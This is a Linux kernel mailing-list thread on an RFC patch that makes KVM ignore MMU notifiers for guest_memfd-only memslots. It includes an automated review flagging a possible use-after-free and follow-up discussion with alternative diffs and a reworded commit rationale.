[RFC PATCH] KVM: Ignore MMU notifiers for guest

All of lore.kernel.org
 help / color / mirror / Atom feed

* [RFC PATCH] KVM: Ignore MMU notifiers for guest_memfd-only memslots
@ 2026-06-15 15:52 Alexandru Elisei
  2026-06-15 16:09 ` sashiko-bot
                   ` (2 more replies)
  0 siblings, 3 replies; 17+ messages in thread
From: Alexandru Elisei @ 2026-06-15 15:52 UTC (permalink / raw)
  To: pbonzini, kvm, linux-kernel, maz, oupton, suzuki.poulose, kvmarm,
	linux-arm-kernel, seanjc, david.hildenbrand, mark.rutland

For guest_memfd-only memslots (kvm_memslot_is_gmem_only() is true), the
memory provider for the virtual machine is the guest_memfd file, not the
userspace mapping. Faults are resolved using the guest_memfd page cache,
and the permissions for the secondary MMU mapping depends exclusively on
the memslot (i.e, if the memslot is read-only). How userspace happens to
have the memory mmaped at fault time, or even if the memory is mapped at
all into userspace, is not taken into consideration.

guest_memfd memory is not evictable, is not movable and there's no backing
storage. Once memory is allocated for an offset in guest_memfd file, the
offset will not change, and that memory is not freed unless userspace
explicitly punches a hole in the file. As a result, memory reclaim, page
migration, page aging and dirty page tracking for the userspace mapping
serve little purpose.

Despite this, KVM's MMU notifiers still modify the secondary MMU page
tables, similar to ordinary memslots, only for the same memory to be
remapped next time a guest accesses it. Make the disconnect between the
user mapping and the secondary MMU page tables explicit by ignoring the MMU
notifiers for guest_memfd-only memslots.

Signed-off-by: Alexandru Elisei <alexandru.elisei@arm.com>
---
The only theoretical instance where the MMU notifiers are invoked for the
userspace mapping of a guest_memfd-only memslot that I was able to find was
automatic NUMA balancing with a non-NULL NUMA policy for the guest_memfd
file. I wasn't able to test it in practice. Also my knowledge of MM is very
limited, so there might be other cases where it happens, or I might be
wrong and today the MMU notifiers are never invoked.

Either way, when and if it happens, having memory unmapped from the
seconday MMU in the case of guest_memfd-only memslot is at most a
performance issue (it causes unnecessary guest faults), but I wanted to
start a conversation about this because having memory that stays mapped at
stage 2 (unless userspace explicitly unmaps it from the VM) is needed for a
Arm feature (called SPE, Statistical Profiling Extension) that I'm working
to upstream. This patch aims to provide the guarantee that memory won't be
unmapped from the secondary MMU behind the VMMs back, which is what happens
for non guest_memfd memslots.

 virt/kvm/kvm_main.c | 4 ++++
 1 file changed, 4 insertions(+)

diff --git a/virt/kvm/kvm_main.c b/virt/kvm/kvm_main.c
index 881f92d7a469..8c4158996928 100644
--- a/virt/kvm/kvm_main.c
+++ b/virt/kvm/kvm_main.c
@@ -592,6 +592,10 @@ static __always_inline kvm_mn_ret_t kvm_handle_hva_range(struct kvm *kvm,
 			unsigned long hva_start, hva_end;

 			slot = container_of(node, struct kvm_memory_slot, hva_node[slots->node_idx]);
+
+			if (kvm_slot_has_gmem(slot) && kvm_memslot_is_gmem_only(slot))
+				continue;
+
 			hva_start = max_t(unsigned long, range->start, slot->userspace_addr);
 			hva_end = min_t(unsigned long, range->end,
 					slot->userspace_addr + (slot->npages << PAGE_SHIFT));

base-commit: 8cd9520d35a6c38db6567e97dd93b1f11f185dc6
-- 
2.54.0

^ permalink raw reply related	[flat|nested] 17+ messages in thread

* Re: [RFC PATCH] KVM: Ignore MMU notifiers for guest_memfd-only memslots
  2026-06-15 15:52 [RFC PATCH] KVM: Ignore MMU notifiers for guest_memfd-only memslots Alexandru Elisei
@ 2026-06-15 16:09 ` sashiko-bot
  2026-06-15 17:47   ` Sean Christopherson
  2026-06-15 19:07 ` David Hildenbrand
  2026-06-21  0:02 ` XIAO WU
  2 siblings, 1 reply; 17+ messages in thread
From: sashiko-bot @ 2026-06-15 16:09 UTC (permalink / raw)
  To: Alexandru Elisei; +Cc: Marc Zyngier, kvm, kvmarm, Oliver Upton

Thank you for your contribution! Sashiko AI review found 1 potential issue(s) to consider:
- [Critical] Skipping MMU notifiers for guest_memfd-only memslots breaks the pfncache retry protocol, leading to a host-level Use-After-Free.
--

commit 8278d4b7bdd8bdfe7a6bc39dd2a0418838234428
Author: Alexandru Elisei <alexandru.elisei@arm.com>

KVM: Ignore MMU notifiers for guest_memfd-only memslots

This commit modifies KVM's MMU notifier handling to ignore guest_memfd-only
memslots. The rationale is that guest_memfd memory is not evictable or movable,
making traditional userspace MMU notifier tracking unnecessary.

> diff --git a/virt/kvm/kvm_main.c b/virt/kvm/kvm_main.c
> --- a/virt/kvm/kvm_main.c
> +++ b/virt/kvm/kvm_main.c
[ ... ]
> @@ -592,6 +592,10 @@ static __always_inline kvm_mn_ret_t kvm_handle_hva_range(struct kvm *kvm,
>  			unsigned long hva_start, hva_end;
>  
>  			slot = container_of(node, struct kvm_memory_slot, hva_node[slots->node_idx]);
> +
> +			if (kvm_slot_has_gmem(slot) && kvm_memslot_is_gmem_only(slot))
> +				continue;
> +

[Severity: Critical]
Does this change inadvertently introduce a regression in the pfncache retry
protocol?

Looking at the pfncache framework, it maps guest memory into kernel space and
explicitly drops the page reference after mapping it:

virt/kvm/pfncache.c:hva_to_pfn_retry() {
    ...
    kvm_release_page_clean(page);
    ...
}

It appears to rely entirely on KVM's MMU notifiers (kvm->mmu_invalidate_seq)
to invalidate the cache when the page is unmapped by the host.

If a VMM defines a guest_memfd-backed memslot with KVM_MEMSLOT_GMEM_ONLY
but still provides a valid anonymous user mapping as its userspace_addr,
could this regression lead to a use-after-free? By unmapping the anonymous
memory, the host would trigger MMU notifiers, but this new check skips
the memslot. As a result, kvm->mmu_invalidate_seq wouldn't increment, and
KVM might retain a kernel mapping to a freed physical page.

Could this allow the guest to read or write arbitrary host physical memory?

>  			hva_start = max_t(unsigned long, range->start, slot->userspace_addr);
>  			hva_end = min_t(unsigned long, range->end,
>  					slot->userspace_addr + (slot->npages << PAGE_SHIFT));

-- 
Sashiko AI review · https://sashiko.dev/#/patchset/20260615155244.183044-1-alexandru.elisei@arm.com?part=1

^ permalink raw reply	[flat|nested] 17+ messages in thread

* Re: [RFC PATCH] KVM: Ignore MMU notifiers for guest_memfd-only memslots
  2026-06-15 16:09 ` sashiko-bot
@ 2026-06-15 17:47   ` Sean Christopherson
  2026-06-15 18:09     ` Sean Christopherson
                       ` (2 more replies)
  0 siblings, 3 replies; 17+ messages in thread
From: Sean Christopherson @ 2026-06-15 17:47 UTC (permalink / raw)
  To: sashiko-reviews; +Cc: Alexandru Elisei, Marc Zyngier, kvm, kvmarm, Oliver Upton

On Mon, Jun 15, 2026, sashiko-bot@kernel.org wrote:
> > diff --git a/virt/kvm/kvm_main.c b/virt/kvm/kvm_main.c
> > --- a/virt/kvm/kvm_main.c
> > +++ b/virt/kvm/kvm_main.c
> [ ... ]
> > @@ -592,6 +592,10 @@ static __always_inline kvm_mn_ret_t kvm_handle_hva_range(struct kvm *kvm,
> >  			unsigned long hva_start, hva_end;
> >  
> >  			slot = container_of(node, struct kvm_memory_slot, hva_node[slots->node_idx]);
> > +
> > +			if (kvm_slot_has_gmem(slot) && kvm_memslot_is_gmem_only(slot))
> > +				continue;
> > +
> 
> [Severity: Critical]
> Does this change inadvertently introduce a regression in the pfncache retry
> protocol?
> 
> Looking at the pfncache framework, it maps guest memory into kernel space and
> explicitly drops the page reference after mapping it:
> 
> virt/kvm/pfncache.c:hva_to_pfn_retry() {
>     ...
>     kvm_release_page_clean(page);
>     ...
> }
> 
> It appears to rely entirely on KVM's MMU notifiers (kvm->mmu_invalidate_seq)
> to invalidate the cache when the page is unmapped by the host.
> 
> If a VMM defines a guest_memfd-backed memslot with KVM_MEMSLOT_GMEM_ONLY
> but still provides a valid anonymous user mapping as its userspace_addr,
> could this regression lead to a use-after-free?

Sadly, yes.  To land this, we would need to first teach the gfn_to_pfn_cache code
to be able to pull directly from guest_memfd.  I forget if anyone is working on
that.

> By unmapping the anonymous memory, the host would trigger MMU notifiers, but
> this new check skips the memslot. As a result, kvm->mmu_invalidate_seq
> wouldn't increment, and KVM might retain a kernel mapping to a freed physical
> page.
> 
> Could this allow the guest to read or write arbitrary host physical memory?
> 
> >  			hva_start = max_t(unsigned long, range->start, slot->userspace_addr);
> >  			hva_end = min_t(unsigned long, range->end,
> >  					slot->userspace_addr + (slot->npages << PAGE_SHIFT));
> 
> -- 
> Sashiko AI review · https://sashiko.dev/#/patchset/20260615155244.183044-1-alexandru.elisei@arm.com?part=1

^ permalink raw reply	[flat|nested] 17+ messages in thread

* Re: [RFC PATCH] KVM: Ignore MMU notifiers for guest_memfd-only memslots
  2026-06-15 17:47   ` Sean Christopherson
@ 2026-06-15 18:09     ` Sean Christopherson
  2026-06-18 11:09       ` Alexandru Elisei
  2026-06-17 13:07     ` Alexandru Elisei
  2026-06-18 11:26     ` David Hildenbrand (Arm)
  2 siblings, 1 reply; 17+ messages in thread
From: Sean Christopherson @ 2026-06-15 18:09 UTC (permalink / raw)
  To: sashiko-reviews; +Cc: Alexandru Elisei, Marc Zyngier, kvm, kvmarm, Oliver Upton

On Mon, Jun 15, 2026, Sean Christopherson wrote:
> On Mon, Jun 15, 2026, sashiko-bot@kernel.org wrote:
> > > diff --git a/virt/kvm/kvm_main.c b/virt/kvm/kvm_main.c
> > > --- a/virt/kvm/kvm_main.c
> > > +++ b/virt/kvm/kvm_main.c
> > [ ... ]
> > > @@ -592,6 +592,10 @@ static __always_inline kvm_mn_ret_t kvm_handle_hva_range(struct kvm *kvm,
> > >  			unsigned long hva_start, hva_end;
> > >  
> > >  			slot = container_of(node, struct kvm_memory_slot, hva_node[slots->node_idx]);
> > > +
> > > +			if (kvm_slot_has_gmem(slot) && kvm_memslot_is_gmem_only(slot))
> > > +				continue;
> > > +
> > 
> > [Severity: Critical]
> > Does this change inadvertently introduce a regression in the pfncache retry
> > protocol?
> > 
> > Looking at the pfncache framework, it maps guest memory into kernel space and
> > explicitly drops the page reference after mapping it:
> > 
> > virt/kvm/pfncache.c:hva_to_pfn_retry() {
> >     ...
> >     kvm_release_page_clean(page);
> >     ...
> > }
> > 
> > It appears to rely entirely on KVM's MMU notifiers (kvm->mmu_invalidate_seq)
> > to invalidate the cache when the page is unmapped by the host.
> > 
> > If a VMM defines a guest_memfd-backed memslot with KVM_MEMSLOT_GMEM_ONLY
> > but still provides a valid anonymous user mapping as its userspace_addr,
> > could this regression lead to a use-after-free?
> 
> Sadly, yes.  To land this, we would need to first teach the gfn_to_pfn_cache code
> to be able to pull directly from guest_memfd.  I forget if anyone is working on
> that.

Actually, we just need to ensure the invalidation tracking is updated, the MMU
itself can be left as-is.

Compile tested only, but this?

diff --git a/include/linux/kvm_host.h b/include/linux/kvm_host.h
index 27498e990dff..690ab707816b 100644
--- a/include/linux/kvm_host.h
+++ b/include/linux/kvm_host.h
@@ -260,6 +260,7 @@ union kvm_mmu_notifier_arg {
 enum kvm_gfn_range_filter {
        KVM_FILTER_SHARED               = BIT(0),
        KVM_FILTER_PRIVATE              = BIT(1),
+       KVM_FILTER_USERSPACE_MAPPINGS   = BIT(2),
 };
 
 struct kvm_gfn_range {
diff --git a/virt/kvm/kvm_main.c b/virt/kvm/kvm_main.c
index e44c20c04961..84b693de7e35 100644
--- a/virt/kvm/kvm_main.c
+++ b/virt/kvm/kvm_main.c
@@ -608,7 +608,8 @@ static __always_inline kvm_mn_ret_t kvm_handle_hva_range(struct kvm *kvm,
                         * HVA-based notifications aren't relevant to private
                         * mappings as they don't have a userspace mapping.
                         */
-                       gfn_range.attr_filter = KVM_FILTER_SHARED;
+                       gfn_range.attr_filter = KVM_FILTER_SHARED |
+                                               KVM_FILTER_USERSPACE_MAPPINGS;
 
                        /*
                         * {gfn(page) | page intersects with [hva_start, hva_end)} =
@@ -715,6 +716,21 @@ void kvm_mmu_invalidate_range_add(struct kvm *kvm, gfn_t start, gfn_t end)
 bool kvm_mmu_unmap_gfn_range(struct kvm *kvm, struct kvm_gfn_range *range)
 {
        kvm_mmu_invalidate_range_add(kvm, range->start, range->end);
+
+       /*
+        * When reacting to changes in userspace mappings, don't unmap memslots
+        * that are guest_memfd-only, in which case KVM's MMU mappings are
+        * pulled directly from guest_memfd, i.e. don't depend on the userspace
+        * mappings.
+        *
+        * TODO: Skip gmem-only memslots on mmu_notifier events entirely, once
+        * gfn_to_pfn_cache is also wired up to directly pull from guest_memfd.
+        */
+       if (range->attr_filter & KVM_FILTER_USERSPACE_MAPPINGS &&
+           kvm_slot_has_gmem(range->slot) &&
+           kvm_memslot_is_gmem_only(range->slot))
+               return false;
+
        return kvm_unmap_gfn_range(kvm, range);
 }

^ permalink raw reply related	[flat|nested] 17+ messages in thread

* Re: [RFC PATCH] KVM: Ignore MMU notifiers for guest_memfd-only memslots
  2026-06-15 15:52 [RFC PATCH] KVM: Ignore MMU notifiers for guest_memfd-only memslots Alexandru Elisei
  2026-06-15 16:09 ` sashiko-bot
@ 2026-06-15 19:07 ` David Hildenbrand
  2026-06-17 13:23   ` Alexandru Elisei
  2026-06-21  0:02 ` XIAO WU
  2 siblings, 1 reply; 17+ messages in thread
From: David Hildenbrand @ 2026-06-15 19:07 UTC (permalink / raw)
  To: Alexandru Elisei, pbonzini, kvm, linux-kernel, maz, oupton,
	suzuki.poulose, kvmarm, linux-arm-kernel, seanjc, mark.rutland

On 6/15/26 17:52, Alexandru Elisei wrote:
> For guest_memfd-only memslots (kvm_memslot_is_gmem_only() is true), the
> memory provider for the virtual machine is the guest_memfd file, not the
> userspace mapping. Faults are resolved using the guest_memfd page cache,
> and the permissions for the secondary MMU mapping depends exclusively on
> the memslot (i.e, if the memslot is read-only). How userspace happens to
> have the memory mmaped at fault time, or even if the memory is mapped at
> all into userspace, is not taken into consideration.
> 
> guest_memfd memory is not evictable, is not movable and there's no backing
> storage. Once memory is allocated for an offset in guest_memfd file, the
> offset will not change, and that memory is not freed unless userspace
> explicitly punches a hole in the file. As a result, memory reclaim, page
> migration, page aging and dirty page tracking for the userspace mapping
> serve little purpose.

I don't think any of that is relevant for the patch at hand?

The thing is: invalidation (truncation, later migration, for any other reason)
is driven through guest_memfd notifications, not through unrelated page tables.

If we don't lookup pages for the KVM MMU through the page table, then there is
also no need for MMU notifiers. It's all guest_memfd only.

Or am I missing something?

-- 
Cheers,

David

^ permalink raw reply	[flat|nested] 17+ messages in thread

* Re: [RFC PATCH] KVM: Ignore MMU notifiers for guest_memfd-only memslots
  2026-06-15 17:47   ` Sean Christopherson
  2026-06-15 18:09     ` Sean Christopherson
@ 2026-06-17 13:07     ` Alexandru Elisei
  2026-06-17 21:21       ` Sean Christopherson
  2026-06-17 21:22       ` Sean Christopherson
  2026-06-18 11:26     ` David Hildenbrand (Arm)
  2 siblings, 2 replies; 17+ messages in thread
From: Alexandru Elisei @ 2026-06-17 13:07 UTC (permalink / raw)
  To: Sean Christopherson
  Cc: sashiko-reviews, Marc Zyngier, kvm, kvmarm, Oliver Upton

Hi Sean,

Thanks for the reply. Just to make sure, once the bugs have been iron out,
you're ok with this idea?

On Mon, Jun 15, 2026 at 10:47:14AM -0700, Sean Christopherson wrote:
> On Mon, Jun 15, 2026, sashiko-bot@kernel.org wrote:
> > > diff --git a/virt/kvm/kvm_main.c b/virt/kvm/kvm_main.c
> > > --- a/virt/kvm/kvm_main.c
> > > +++ b/virt/kvm/kvm_main.c
> > [ ... ]
> > > @@ -592,6 +592,10 @@ static __always_inline kvm_mn_ret_t kvm_handle_hva_range(struct kvm *kvm,
> > >  			unsigned long hva_start, hva_end;
> > >  
> > >  			slot = container_of(node, struct kvm_memory_slot, hva_node[slots->node_idx]);
> > > +
> > > +			if (kvm_slot_has_gmem(slot) && kvm_memslot_is_gmem_only(slot))
> > > +				continue;
> > > +
> > 
> > [Severity: Critical]
> > Does this change inadvertently introduce a regression in the pfncache retry
> > protocol?
> > 
> > Looking at the pfncache framework, it maps guest memory into kernel space and
> > explicitly drops the page reference after mapping it:
> > 
> > virt/kvm/pfncache.c:hva_to_pfn_retry() {
> >     ...
> >     kvm_release_page_clean(page);
> >     ...
> > }
> > 
> > It appears to rely entirely on KVM's MMU notifiers (kvm->mmu_invalidate_seq)
> > to invalidate the cache when the page is unmapped by the host.
> > 
> > If a VMM defines a guest_memfd-backed memslot with KVM_MEMSLOT_GMEM_ONLY
> > but still provides a valid anonymous user mapping as its userspace_addr,
> > could this regression lead to a use-after-free?
> 
> Sadly, yes.  To land this, we would need to first teach the gfn_to_pfn_cache code
> to be able to pull directly from guest_memfd.  I forget if anyone is working on
> that.

I've been trying to wrap my head around this, and I just can't seem to
figure it out.

kvm_mmu_notifier_invalidate_range_start(), before handle_hva_range(), calls
gfn_to_pfn_cache_invalidate_start() for the MMU notifier range, and that
marks all caches that overlap the range as invalid. kvm_gpc_check() returns
false for an invalid cache, so how can the memory still be accessed via the
pfncache?

> 
> > By unmapping the anonymous memory, the host would trigger MMU notifiers, but
> > this new check skips the memslot. As a result, kvm->mmu_invalidate_seq
> > wouldn't increment, and KVM might retain a kernel mapping to a freed physical
> > page.

kvm->mmu_invalidate_seq is incremented in kvm_mmu_invalidate_end(), I don't see
how that is affected by skipping a memslot in handle_hva_range().

> > 
> > Could this allow the guest to read or write arbitrary host physical memory?

The KVM_MEMSLOT_GMEM_ONLY flag is set if the backing guest_memfd has been
created with GUEST_MEMFD_FLAG_MMAP. The documentation for the flag says
that '[..] the fault will always be consumed from guest_memfd, regardless
of whether it is a shared or private fault'.  As far as I can tell, this
means that, absent a fallocate(FALLOC_FL_PUNCH_HOLE) call, the page is
still in the page cache for the guest_memfd file after userspace has
unmapped it, so the guest will not be accessing a freed page.

Thoughts? Am I missing something obvious?

Thanks,
Alex

> > 
> > >  			hva_start = max_t(unsigned long, range->start, slot->userspace_addr);
> > >  			hva_end = min_t(unsigned long, range->end,
> > >  					slot->userspace_addr + (slot->npages << PAGE_SHIFT));
> > 
> > -- 
> > Sashiko AI review · https://sashiko.dev/#/patchset/20260615155244.183044-1-alexandru.elisei@arm.com?part=1

^ permalink raw reply	[flat|nested] 17+ messages in thread

* Re: [RFC PATCH] KVM: Ignore MMU notifiers for guest_memfd-only memslots
  2026-06-15 19:07 ` David Hildenbrand
@ 2026-06-17 13:23   ` Alexandru Elisei
  2026-06-17 13:41     ` David Hildenbrand
  0 siblings, 1 reply; 17+ messages in thread
From: Alexandru Elisei @ 2026-06-17 13:23 UTC (permalink / raw)
  To: David Hildenbrand
  Cc: pbonzini, kvm, linux-kernel, maz, oupton, suzuki.poulose, kvmarm,
	linux-arm-kernel, seanjc, mark.rutland

Hi David,

On Mon, Jun 15, 2026 at 09:07:50PM +0200, David Hildenbrand wrote:
> On 6/15/26 17:52, Alexandru Elisei wrote:
> > For guest_memfd-only memslots (kvm_memslot_is_gmem_only() is true), the
> > memory provider for the virtual machine is the guest_memfd file, not the
> > userspace mapping. Faults are resolved using the guest_memfd page cache,
> > and the permissions for the secondary MMU mapping depends exclusively on
> > the memslot (i.e, if the memslot is read-only). How userspace happens to
> > have the memory mmaped at fault time, or even if the memory is mapped at
> > all into userspace, is not taken into consideration.
> > 
> > guest_memfd memory is not evictable, is not movable and there's no backing
> > storage. Once memory is allocated for an offset in guest_memfd file, the
> > offset will not change, and that memory is not freed unless userspace
> > explicitly punches a hole in the file. As a result, memory reclaim, page
> > migration, page aging and dirty page tracking for the userspace mapping
> > serve little purpose.
> 
> I don't think any of that is relevant for the patch at hand?
> 
> The thing is: invalidation (truncation, later migration, for any other reason)
> is driven through guest_memfd notifications, not through unrelated page tables.
> 
> If we don't lookup pages for the KVM MMU through the page table, then there is
> also no need for MMU notifiers. It's all guest_memfd only.
> 
> Or am I missing something?

My thinking was that, because guest_memfd is not evictable, there is no need to
do page ageing, which would require that secondary MMU mappings be made old.

The invalidate callbacks are also used when userspace memory is marked read-only
for dirty state tracking. I was trying to explaing that, since there is no
backing for the guest_memfd file, host doesn't need to keep track of dirty state
for the memory, and ignoring the invalidate callbacks is correct for all cases.

I can drop the paragraph entirely, if you think that would make the commit
message clearer.

Thanks,
Alex

^ permalink raw reply	[flat|nested] 17+ messages in thread

* Re: [RFC PATCH] KVM: Ignore MMU notifiers for guest_memfd-only memslots
  2026-06-17 13:23   ` Alexandru Elisei
@ 2026-06-17 13:41     ` David Hildenbrand
  2026-06-17 13:50       ` Alexandru Elisei
  0 siblings, 1 reply; 17+ messages in thread
From: David Hildenbrand @ 2026-06-17 13:41 UTC (permalink / raw)
  To: Alexandru Elisei
  Cc: pbonzini, kvm, linux-kernel, maz, oupton, suzuki.poulose, kvmarm,
	linux-arm-kernel, seanjc, mark.rutland

On 6/17/26 15:23, Alexandru Elisei wrote:
> Hi David,
> 
> On Mon, Jun 15, 2026 at 09:07:50PM +0200, David Hildenbrand wrote:
>> On 6/15/26 17:52, Alexandru Elisei wrote:
>>> For guest_memfd-only memslots (kvm_memslot_is_gmem_only() is true), the
>>> memory provider for the virtual machine is the guest_memfd file, not the
>>> userspace mapping. Faults are resolved using the guest_memfd page cache,
>>> and the permissions for the secondary MMU mapping depends exclusively on
>>> the memslot (i.e, if the memslot is read-only). How userspace happens to
>>> have the memory mmaped at fault time, or even if the memory is mapped at
>>> all into userspace, is not taken into consideration.
>>>
>>> guest_memfd memory is not evictable, is not movable and there's no backing
>>> storage. Once memory is allocated for an offset in guest_memfd file, the
>>> offset will not change, and that memory is not freed unless userspace
>>> explicitly punches a hole in the file. As a result, memory reclaim, page
>>> migration, page aging and dirty page tracking for the userspace mapping
>>> serve little purpose.
>>
>> I don't think any of that is relevant for the patch at hand?
>>
>> The thing is: invalidation (truncation, later migration, for any other reason)
>> is driven through guest_memfd notifications, not through unrelated page tables.
>>
>> If we don't lookup pages for the KVM MMU through the page table, then there is
>> also no need for MMU notifiers. It's all guest_memfd only.
>>
>> Or am I missing something?
> 
> My thinking was that, because guest_memfd is not evictable, there is no need to
> do page ageing, which would require that secondary MMU mappings be made old.

Not really.

The KVM MMU did not obtain the folios through the page tables, but directly
through guest_memfd. Any aging would, therefore, have to be done through
guest_memfd.

Which we don't support and don't want to support :)

That we happen to have a matching user space range that maps the guest_memfd is
just coincidence from a KVM MMU point of view.

> 
> The invalidate callbacks are also used when userspace memory is marked read-only
> for dirty state tracking. I was trying to explaing that, since there is no
> backing for the guest_memfd file, host doesn't need to keep track of dirty state
> for the memory, and ignoring the invalidate callbacks is correct for all cases.
> 
> I can drop the paragraph entirely, if you think that would make the commit
> message clearer.

I think the real motivation is:

"Mappings in the secondary MMU were established by obtaining folios from
guest_memfd directly, not by looking the folios up through the page tables
through GUP. Consequently, there is no relationship between the page tables and
the secondary MMU: MMU notifiers do not apply."

-- 
Cheers,

David

^ permalink raw reply	[flat|nested] 17+ messages in thread

* Re: [RFC PATCH] KVM: Ignore MMU notifiers for guest_memfd-only memslots
  2026-06-17 13:41     ` David Hildenbrand
@ 2026-06-17 13:50       ` Alexandru Elisei
  0 siblings, 0 replies; 17+ messages in thread
From: Alexandru Elisei @ 2026-06-17 13:50 UTC (permalink / raw)
  To: David Hildenbrand
  Cc: pbonzini, kvm, linux-kernel, maz, oupton, suzuki.poulose, kvmarm,
	linux-arm-kernel, seanjc, mark.rutland

Hi David,

On Wed, Jun 17, 2026 at 03:41:41PM +0200, David Hildenbrand wrote:
> On 6/17/26 15:23, Alexandru Elisei wrote:
> > Hi David,
> > 
> > On Mon, Jun 15, 2026 at 09:07:50PM +0200, David Hildenbrand wrote:
> >> On 6/15/26 17:52, Alexandru Elisei wrote:
> >>> For guest_memfd-only memslots (kvm_memslot_is_gmem_only() is true), the
> >>> memory provider for the virtual machine is the guest_memfd file, not the
> >>> userspace mapping. Faults are resolved using the guest_memfd page cache,
> >>> and the permissions for the secondary MMU mapping depends exclusively on
> >>> the memslot (i.e, if the memslot is read-only). How userspace happens to
> >>> have the memory mmaped at fault time, or even if the memory is mapped at
> >>> all into userspace, is not taken into consideration.
> >>>
> >>> guest_memfd memory is not evictable, is not movable and there's no backing
> >>> storage. Once memory is allocated for an offset in guest_memfd file, the
> >>> offset will not change, and that memory is not freed unless userspace
> >>> explicitly punches a hole in the file. As a result, memory reclaim, page
> >>> migration, page aging and dirty page tracking for the userspace mapping
> >>> serve little purpose.
> >>
> >> I don't think any of that is relevant for the patch at hand?
> >>
> >> The thing is: invalidation (truncation, later migration, for any other reason)
> >> is driven through guest_memfd notifications, not through unrelated page tables.
> >>
> >> If we don't lookup pages for the KVM MMU through the page table, then there is
> >> also no need for MMU notifiers. It's all guest_memfd only.
> >>
> >> Or am I missing something?
> > 
> > My thinking was that, because guest_memfd is not evictable, there is no need to
> > do page ageing, which would require that secondary MMU mappings be made old.
> 
> Not really.
> 
> The KVM MMU did not obtain the folios through the page tables, but directly
> through guest_memfd. Any aging would, therefore, have to be done through
> guest_memfd.
> 
> Which we don't support and don't want to support :)
> 
> That we happen to have a matching user space range that maps the guest_memfd is
> just coincidence from a KVM MMU point of view.
> 
> > 
> > The invalidate callbacks are also used when userspace memory is marked read-only
> > for dirty state tracking. I was trying to explaing that, since there is no
> > backing for the guest_memfd file, host doesn't need to keep track of dirty state
> > for the memory, and ignoring the invalidate callbacks is correct for all cases.
> > 
> > I can drop the paragraph entirely, if you think that would make the commit
> > message clearer.
> 
> I think the real motivation is:
> 
> "Mappings in the secondary MMU were established by obtaining folios from
> guest_memfd directly, not by looking the folios up through the page tables
> through GUP. Consequently, there is no relationship between the page tables and
> the secondary MMU: MMU notifiers do not apply."

That's much better than my version, thanks!

Alex

^ permalink raw reply	[flat|nested] 17+ messages in thread

* Re: [RFC PATCH] KVM: Ignore MMU notifiers for guest_memfd-only memslots
  2026-06-17 13:07     ` Alexandru Elisei
@ 2026-06-17 21:21       ` Sean Christopherson
  2026-06-18 10:19         ` Alexandru Elisei
  2026-06-23 23:41         ` Ackerley Tng
  2026-06-17 21:22       ` Sean Christopherson
  1 sibling, 2 replies; 17+ messages in thread
From: Sean Christopherson @ 2026-06-17 21:21 UTC (permalink / raw)
  To: Alexandru Elisei; +Cc: sashiko-reviews, Marc Zyngier, kvm, kvmarm, Oliver Upton

On Wed, Jun 17, 2026, Alexandru Elisei wrote:
> Hi Sean,
> 
> Thanks for the reply. Just to make sure, once the bugs have been iron out,
> you're ok with this idea?
> 
> On Mon, Jun 15, 2026 at 10:47:14AM -0700, Sean Christopherson wrote:
> > On Mon, Jun 15, 2026, sashiko-bot@kernel.org wrote:
> > > > diff --git a/virt/kvm/kvm_main.c b/virt/kvm/kvm_main.c
> > > > --- a/virt/kvm/kvm_main.c
> > > > +++ b/virt/kvm/kvm_main.c
> > > [ ... ]
> > > > @@ -592,6 +592,10 @@ static __always_inline kvm_mn_ret_t kvm_handle_hva_range(struct kvm *kvm,
> > > >  			unsigned long hva_start, hva_end;
> > > >  
> > > >  			slot = container_of(node, struct kvm_memory_slot, hva_node[slots->node_idx]);
> > > > +
> > > > +			if (kvm_slot_has_gmem(slot) && kvm_memslot_is_gmem_only(slot))
> > > > +				continue;
> > > > +
> > > 
> > > [Severity: Critical]
> > > Does this change inadvertently introduce a regression in the pfncache retry
> > > protocol?
> > > 
> > > Looking at the pfncache framework, it maps guest memory into kernel space and
> > > explicitly drops the page reference after mapping it:
> > > 
> > > virt/kvm/pfncache.c:hva_to_pfn_retry() {
> > >     ...
> > >     kvm_release_page_clean(page);
> > >     ...
> > > }
> > > 
> > > It appears to rely entirely on KVM's MMU notifiers (kvm->mmu_invalidate_seq)
> > > to invalidate the cache when the page is unmapped by the host.
> > > 
> > > If a VMM defines a guest_memfd-backed memslot with KVM_MEMSLOT_GMEM_ONLY
> > > but still provides a valid anonymous user mapping as its userspace_addr,
> > > could this regression lead to a use-after-free?
> > 
> > Sadly, yes.  To land this, we would need to first teach the gfn_to_pfn_cache code
> > to be able to pull directly from guest_memfd.  I forget if anyone is working on
> > that.
> 
> I've been trying to wrap my head around this, and I just can't seem to
> figure it out.
> 
> kvm_mmu_notifier_invalidate_range_start(), before handle_hva_range(), calls
> gfn_to_pfn_cache_invalidate_start() for the MMU notifier range, and that
> marks all caches that overlap the range as invalid. kvm_gpc_check() returns
> false for an invalid cache, so how can the memory still be accessed via the
> pfncache?

That just forces gpcs to be refreshed, mmu_notifier_retry_cache() still relies
on mmu_invalidate_seq being bumped to avoid consuming stale state.

> > > By unmapping the anonymous memory, the host would trigger MMU notifiers, but
> > > this new check skips the memslot. As a result, kvm->mmu_invalidate_seq
> > > wouldn't increment, and KVM might retain a kernel mapping to a freed physical
> > > page.
> 
> kvm->mmu_invalidate_seq is incremented in kvm_mmu_invalidate_end(), I don't see
> how that is affected by skipping a memslot in handle_hva_range().

handle_hva_range() only invokes on_lock() if a memslot is found.  By skipping the
memslot entirely, kvm_mmu_invalidate_{start,end}() won't be called and so
mmu_invalidate_seq won't be bumped.

> > > Could this allow the guest to read or write arbitrary host physical memory?
> 
> The KVM_MEMSLOT_GMEM_ONLY flag is set if the backing guest_memfd has been
> created with GUEST_MEMFD_FLAG_MMAP. The documentation for the flag says
> that '[..] the fault will always be consumed from guest_memfd, regardless
> of whether it is a shared or private fault'.  As far as I can tell, this
> means that, absent a fallocate(FALLOC_FL_PUNCH_HOLE) call, the page is
> still in the page cache for the guest_memfd file after userspace has
> unmapped it, so the guest will not be accessing a freed page.

KVM_MEMSLOT_GMEM_ONLY is somewhat misleading, it only applies to the KVM's MMU.
For other cases where KVM accesses guest memory, KVM still follows the host virtual
address, e.g. so that copy_{to,from}_user() Just Works.  But userspace isn't
strictly *required* to keep the userspace mapping coherent with guest_memfd, nor
is userspace required to make the userspace mapping fully RWX.  And so if
userspace modifies the VMA, KVM needs to react accordingly.

When in-place conversion comes along, KVM will also rely on userspace mappings
being torn down before allow a SHARED page to become PRIVATE (for all intents
and purposes, we're conceptually treating conversions as free()+re-alloc().  So
while the page might still be in the page cache, it's effectively been "freed".
So in that case, KVM really does need to ensure it handles mmu_notifier events
correctly to avoid UAF.

^ permalink raw reply	[flat|nested] 17+ messages in thread

